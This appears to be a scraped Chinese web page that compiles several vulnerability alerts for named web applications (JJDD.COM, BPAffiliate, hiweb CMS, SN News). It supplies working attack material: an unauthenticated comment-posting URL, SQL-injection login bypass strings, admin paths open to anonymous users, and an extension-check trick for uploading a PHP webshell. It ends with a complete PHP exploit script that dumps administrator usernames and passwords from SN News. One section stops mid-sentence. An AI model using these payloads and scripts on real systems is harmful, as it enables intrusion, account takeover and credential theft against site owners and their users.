JJDD.COM绕过权限验证任意留言评论漏洞预警

2023-05-19 08:36:29| 收藏本文下载本文作者：lizzzvon

以下是小编帮大家整理的JJDD.COM绕过权限验证任意留言评论漏洞预警（共含7篇），供大家参考借鉴，希望可以帮助到您。同时，但愿您也能像本文投稿人“lizzzvon”一样，积极向本站投稿分享好文章。

篇1：JJDD.COM绕过权限验证任意留言评论漏洞预警

jjdd.com/ 针对有热度的人要回复留言评论等都需要红豆，而红豆要购买，

现在可以直接利用这个接口绕过前台的权限验证

www.jjdd.com/comment/add_comment?uid={uid}&ouid={ouid}&relate_uid=&reply_comment_id=&source_id=3&source_type=3&status=1&content=test&pay_card=0

{uid}：发送人的用户ID

{ouid}：接收信息的用户ID

{source_type}：信息类型，目前已知道的有，1是相册；2是个人说说；3是小编专访

{source_id}：信息类型对应的对象ID（通过查看html源码可以知道要回复的对应ID是多少）

透过上面的DEMO地址，将参数对应填入，即可任意留言回复，

而且用户ID可以任意填写，没有限制只能当前登录用户。

修复方案：

在这接口验证权限作者

篇2：BPAffiliate Affiliate Tracking验证绕过漏洞漏洞预警

BPAffiliate Tracking是一款经销商程序脚本，可以用于跟踪加盟会员，BPAffiliate Tracking存在验证绕过漏洞，可能导致攻击者直接获取管理员权限。

[+]info:

~~~~~~~~~

BPAffiliate Affiliate Tracking Authentication Bypass Vulnerability

Author: v3n0m

Site : yogyacarderlink.web.id/

Date : November, 16-

Location : Jakarta, Indonesia

Time Zone : GMT +7:00

Application : BPAffiliateTracking - Affiliate Tracking Script

Price : $24.40

Vendor: www.bpowerhouse.info/

[+]poc:

~~~~~~~~~

go to

127.0.0.1/[path]/adminlogin.asp

then login with

Username : admin

Password : 1'or'1'='1

[+]Reference:

~~~~~~~~~

www.exploit-db.com/exploits/15551

出自：BugZone

篇3：hiweb cms后台多出权限绕过漏洞预警

HIWEB是一套整站管理系统，很多学校在用这个来搭站，但是此cms后台存在多处权限绕过的问题。

1. xxxx/hiwebcms/system/USER/

可以直接看到所有后台用户信息

2. xxxx/hiwebcms/system/sysSetup/filesManage.htm

可以查看所有上传的文件，匿名用户也可以上传文件，

3. xxxx/hiwebcms/system/sysSetup/sysSetup.htm

可以查看cms的部分配置

4. xxxx/hiwebcms/system/USER/userConfig.htm

查看数据库中部分表结构

可以直接看到所有后台用户信息

可以查看所有上传的文件，匿名用户也可以上传文件。

可以查看cms的部分配置

查看数据库中部分表结构

篇4：一个简单的文件扩展名验证绕过技巧漏洞预警

挖掘web应用程序0day最有效、最直接的办法就是直接从文件操作函数入手，我个人喜好首先看上传类代码，本文来个简单技巧，当然技巧不完全是个人原创，也是通过学些别人的技巧自己想到的，所有本文的目的也是做个奠基，然后对你将来的挖掘过程有所启发。

函数代码：

function download( $content, $absurl = “”, $basehref = “”, $exts = “gif|jpg|jpeg|bmp|png” )

{

global $cfg;

$string = stripslashes( $content );

if ( !preg_match_all( “/(href|src)=([\”|']?)([^ \“'>]+\\.(”.$exts.“))\\2/i”, $string, $matches ) )

{

return $content;

}

$remotefileurls = array( );

//此处省略若干……

unset( $matches );

unset( $string );

$remotefileurls = array_unique( $remotefileurls );

$filepath = date( “Y/md/”, $this->dateline );

$imgdir = $this->imgdir.$filepath;

include_once( ROOT.“./core/dir.func.php” );

dir_create( $imgdir );

foreach ( $remotefileurls as $k =>$file )

{

$ext = fileext( $file );

$salt = rand( 1000, 9999 );

$filename = $this->dateline.$salt.“.”.$ext;

$newfile = $imgdir.$filename;

if ( @copy( $file, $newfile ) )

{

$oldpath[$k] = $k;

$newpath[$k] = $imgurl.$filename;

@chmod( $newfile, 511 );

}

//此处省略若干……

}

return str_replace( $oldpath, $newpath, $content );

}

这个是一个实现远程图片自动上传功能的函数，用户提交的content中若有图片地址则自动将远程的地址copy到本地！在清楚content中的图片路径时候采用preg_match_all 正则匹配（红色代码部分），虽然有扩展名的验证但是很容易就能绕过，我们只需要将shell地址修改为：www.mysite.com/shell.php?1.gif就可以绕过了，mysite是自己的网站地址，如果自己网站下解析php的话那么php内容应该是

篇5：SN News = 1.2管理权限验证绕过及注射漏洞预警

SN News <= 1.2 (/admin/loger.php) Admin Bypass Remote SQL Injection Vulnerability

影响版本 1.2

下载地址: phpbrasil.com/script/JHnpFRmSBqlf/sn-news

作者不为任何危害负责

##############################################################################

## 缺陷位于- /admin/logar.php [4-15]:

4.$login = $_POST[“login”];

5.$senha = $_POST[“senha”];

6.$sql = “select * from news_adm where login='$login' AND senha='$senha'”;

7.$query = mysql_query($sql);

8.$nr = mysql_num_rows($query);

9.if($nr>0){

10.$_SESSION[“admin”] = “on”;

11.echo “

14.”;

15.}

## 注释:

## As you can see there is no validation or any filter to variables $login and $senha.

## See line 6, so you can inject sql query by using $login and $senha variables.

## SQL Injection PoC:

## www.xxx.com /sn_news/admin/login.htm

## Login: ' or '1'='1

## Senha: ' or '1'='1

## This injection will bypass the admin login screen.

# 标题: SN News <= 1.2 SQL Injection

示例:

$ php mnews.php www.xxx.com /scripts/mnews/

error_reporting(E_ERROR);

set_time_limit(0);

@ini_set(“default_socket_timeout”, 30);

function hex($string){

$hex=''; // PHP 'Dim' =]

for ($i=0; $i < strlen($string); $i++){

$hex .= dechex(ord($string[$i]));

}

return '0x'.$hex;

}

echo “\nSN News <= 1.2 SQL Injection exploit\n”;

echo “Discovered and written by WhiteCollarGroup\n”;

echo “www.wcgroup.host56.com - whitecollar_group@hotmail.com\n\n”;

if($argc!=2) {

echo “Usage: \n”;

echo “php $argv[0] \n”;

echo “Example:\n”;

echo “php $argv[0] www.website.com/snnews\n”;

exit;

}

$target = $argv[1];

if(substr($target, (strlen($target)-1))!=“/”) {

$target .= “/”;

}

$inject = $target . “visualiza.php?id=-0'%20”;

$token = uniqid;

$token_hex = hex($token);

echo “[*] Trying to get informations...\n”;

$infos = file_get_contents($inject.urlencode(“union all select 1,concat(”.$token_hex.“, user(), ”.$token_hex.“, version(), ”.$token_hex.“),3,4,5-- ”));

$infos_r = array();

preg_match_all(“/$token(.*)$token(.*)$token/”, $infos, $infos_r);

$user = $infos_r[1][0];

$version = $infos_r[2][0];

if($user) {

echo “[*] MySQL version: $version\n”;

echo “[*] MySQL user: $user\n”;

} else {

echo “[-] Error while getting informations.\n”;

}

echo “[*] Getting users...\n”;

$i = 0;

while(true) {

$dados_r = array();

$dados = file_get_contents($inject.urlencode(“union all select 1,concat(”.$token_hex.“, login, ”.$token_hex.“, senha, ”.$token_hex.“),3,4,5 from news_adm limit $i,1-- ”));

preg_match_all(“/$token(.*)$token(.*)$token/”, $dados, $dados_r);

$login = $dados_r[1][0];

$senha = $dados_r[2][0];

if(($login) AND ($senha)) {

echo “-+-\n”;

echo “User: $login\n”;

echo “Pass: $senha\n”;

} else {

break;

}

$i++;

}